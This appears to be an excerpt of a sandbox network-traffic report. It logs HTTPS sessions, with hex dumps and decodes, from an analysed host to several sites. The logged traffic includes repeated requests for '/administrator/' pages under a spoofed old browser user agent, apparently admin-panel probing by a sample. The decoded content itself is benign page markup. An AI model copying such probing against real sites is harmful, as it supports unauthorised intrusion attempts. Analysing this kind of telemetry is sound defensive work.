                                                                                                                                                                                                                                                                                                                Data Ascii: /doclinks.js?v=5.2.1"></script><script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script><script data-cfasync="false" type="text/javascript" src="js/dist/navigation.js?v=5.2.1"></script><script data-cfasync="false"
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 72 61 67 5f 64 72 6f 70 5f 69 6d 70 6f 72 74 2e 6a 73
                                                                                                                                                                                                                                                                                                                Data Ascii: " type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script><script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script><script data-cfasync="false" type="text/javascript" src="js/dist/drag_drop_import.js
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 27 41 70 72 69 6c 27 2c 0a 20 20 20 20 27 4d 61 79 27 2c 0a 20 20 20 20 27 4a 75 6e 65 27 2c 0a 20 20 20 20 27 4a 75 6c 79 27 2c 0a 20 20 20 20 27 41 75 67 75 73 74 27 2c 0a 20 20 20 20 27 53 65 70 74 65 6d 62 65 72 27 2c 0a 20 20 20 20 27 4f 63 74 6f 62 65 72 27 2c 0a 20 20 20 20 27 4e 6f 76
                                                                                                                                                                                                                                                                                                                Data Ascii: Text = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'Nov
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 30 32 30 74 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 27 2c 0a 20 20 20 20 65 6d 61 69 6c 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 69 64 5c 75 30 30 32 30 65 6d 61 69 6c 5c 75 30 30 32 30 61 64 64 72 65 73 73 27 2c 0a 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: ion extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0020this\u0020field', email: 'Please\u0020enter\u0020a\u0020valid\u0020email\u0020address',
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 76 61 6c 69 64 61 74 69 6f 6e 46 75 6e 63 74 69 6f 6e 46 6f 72 44 61 74 65 54 69 6d 65 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61
                                                                                                                                                                                                                                                                                                                Data Ascii: \u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), validationFunctionForDateTime: $.validator.format('Please\u0020enter\u0020a\u0020va
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 64 6f 63 6c 69 6e 6b 73 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 69 6e 64 65 78 65
                                                                                                                                                                                                                                                                                                                Data Ascii: vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js', 1) .add('doclinks.js', 1) .add('functions.js', 1) .add('navigation.js', 1) .add('indexe


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                23192.168.2.6549523.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC249OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                24192.168.2.654818178.172.160.19443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC159OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: hoster.by
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC617INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 37 33 37 35 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 48 54 54 50 53 0d 0a 50 33 50 3a 20 70 6f 6c 69 63 79 72 65 66 3d 22 2f 62 69 74 72 69 78 2f 70 33 70 2e 78 6d 6c 22 2c 20 43 50 3d 22 4e 4f 4e 20 44 53 50 20 43 4f 52 20 43 55 52 20 41 44 4d 20 44 45 56 20 50 53 41 20 50 53 44 20 4f 55 52 20 55 4e 52 20 42 55 53 20 55 4e 49 20 43 4f 4d 20 4e 41 56 20 49 4e 54 20 44 45 4d 20 53 54 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKDate: Sat, 02 Dec 2023 01:09:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 473755Connection: closeVary: HTTPSP3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC15767INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 2e 61 73 79 6e 63 2d 68 69 64 65 20 7b 20 6f 70 61 63 69 74 79 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 20 3c 2f 73 74 79 6c 65 3e 0d 0a 09 3c 74 69 74 6c 65 3e d0 90 d1 80 d0 b5 d0 bd d0 b4 d0 b0 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 b0 20 d0 b8 20 d0 be d0 b1 d0 bb d0 b0 d1 87 d0 bd d1 8b d1 85 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d0 b9 20 d0 b4 d0 bb d1 8f 20 d0 b1 d0 b8 d0 b7 d0 bd d0 b5 d1 81 d0 b0 2e 20 d0 9a d1 83 d0 bf d0 b8 d1 82 d1 8c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 20 d0 b2 20 d0 91 d0 b5 d0 bb d0 b0 d1 80 d1 83 d1 81
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ru"><head> <style>.async-hide { opacity: 0 !important} </style><title> .
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC16384INData Raw: d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 35 30 25 20 d0 bf d1 80 d0 b8 20 d0 bf d0 b5 d1 80 d0 b5 d0 bd d0 be d1 81 d0 b5 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d0 bd d0 b0 20 68 6f 73 74 65 72 2e 62 79 22 2c 0a 09 09 09 22 61 64 64 72 65 73 73 22 3a 20 7b 0a 09 09 09 09 22 40 74 79 70 65 22 20 3a 20 22 50 6f 73 74 61 6c 41 64 64 72 65 73 73 22 2c 0a 09 09 09 09 22 61 64 64 72 65 73 73 4c 6f 63 61 6c 69 74 79 22 20 3a 20 22 d0 9c d0 b8 d0 bd d1 81 d0 ba 22 2c 0a 09 09 09 09 22 73 74 72 65 65 74 41 64 64 72 65 73 73 22 20 3a 20 22 d1 83 d0 bb 2e 20 d0 90 d1 80 d0 b0 d0 bd d1 81 d0 ba d0 b0 d1 8f 20 38 22 2c 0a 09 09 09 09 22 70 6f 73 74 61 6c 43 6f 64 65 22 20 3a 20 22 32 32 30 31 34 30 22 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 09 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                                                                                                                                                Data Ascii: 50% hoster.by","address": {"@type" : "PostalAddress","addressLocality" : "","streetAddress" : ". 8","postalCode" : "220140"}}}</script
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 68 6f 73 74 65 72 2e 62 79 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 68 6f 69 73 2d d1 81 d0 b5 d1 80 d0 b2 d0 b8 d1 81 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://whois.hoster.by/" class="menu-item-link m-font-b1" id="menu-item"> <span>Whois-</span>
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 2f 63 6c 6f 75 64 2f 6d 61 69 6c 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="/service/cloud/mail/" class="menu-item-link m-font-b1" id="menu-item">
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 2f 73 6f 6c 75 74 69 6f 6e 73 2f 6d 6f 76 65 2f 68 6f 73 74 69 6e 67 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: </a> <a href="/service/solutions/move/hosting/" class="menu-item-link m-font-b1" id="menu-item">
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 63 6c 69 65 6e 74 73 2f 64 6f 63 75 6d 65 6e 74 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: </a> <a href="/clients/documents/" class="menu-item-link m-font-b1" id="menu-item">
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 74 69 74 6c 65 22 3e 53 4d 53 2d d0 bf d0 be d0 b4 d1 82 d0 b2 d0 b5 d1 80 d0 b6 d0 b4 d0 b5 d0 bd d0 b8 d0 b5 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 74 69 74 6c 65 22 3e d0 9f d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 b2 d0 b2 d0 b5 d0 b4 d0 b8 d1 82 d0 b5 20 d0 ba d0 be d0 b4 20 d0 bf d0 be d0 b4 d1 82 d0 b2 d0 b5 d1 80 d0 b6 d0 b4 d0 b5 d0 bd d0 b8 d1 8f 2c 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 bd d1 8b d0 b9 20 d0 bd d0 b0 20 d0 bd d0 be d0 bc d0 b5 d1 80 20 3c 73 70 61 6e 20 6e 61 6d 65 3d 22 70 68 6f 6e 65 64 75 70 6c 65 78 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 62 79 2d 73
                                                                                                                                                                                                                                                                                                                Data Ascii: title">SMS-</div> <div class="subtitle">, , <span name="phoneduplex"></span></div> <div class="hby-s
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 68 62 79 2d 6c 61 62 65 6c 22 20 66 6f 72 3d 22 65 6d 61 69 6c 22 3e d0 92 d0 b0 d1 88 20 45 6d 61 69 6c 2a 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 62 79 2d 65 72 72 6f 72 2d 74 65 78 74 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e d0 9f d1 80 d0 be d0 b2 d0 b5 d1 80 d1 82 d0 b5 20 d0 ba d0 be d1 80 d1 80 d0 b5 d0 ba d1 82 d0 bd d0 be d1 81 d1 82 d1 8c 20 d0 b2 d0 b2 d0 b5 d0 b4 d1 91 d0 bd d0 bd d0 be d0 b3 d0 be 20 45 6d 61 69 6c 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <label class="hby-label" for="email"> Email*</label> <div class="hby-error-text" style="display: none;"> Email</div>
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 6c 69 6e 6b 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 2f 73 6f 6c 75 74 69 6f 6e 73 2f 69 6e 66 6f 72 6d 61 74 73 69 6f 6e 6e 61 79 61 2d 62 65 7a 6f 70 61 73 6e 6f 73 74 2f 61 74 74 65 73 74 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 2d 61 72 72 6f 77 22 20 77 69 64 74 68 3d 22 38 22 20 68 65
                                                                                                                                                                                                                                                                                                                Data Ascii: v class="product-link-item"> <a href="/service/solutions/informatsionnaya-bezopasnost/attestation/" class="m-link"> <svg xmlns="http://www.w3.org/2000/svg" class="link-arrow" width="8" he


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                25192.168.2.6549533.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC249OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 30 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 63 37 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:50:31 GMTConnection: closeETag: "65691fc7-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
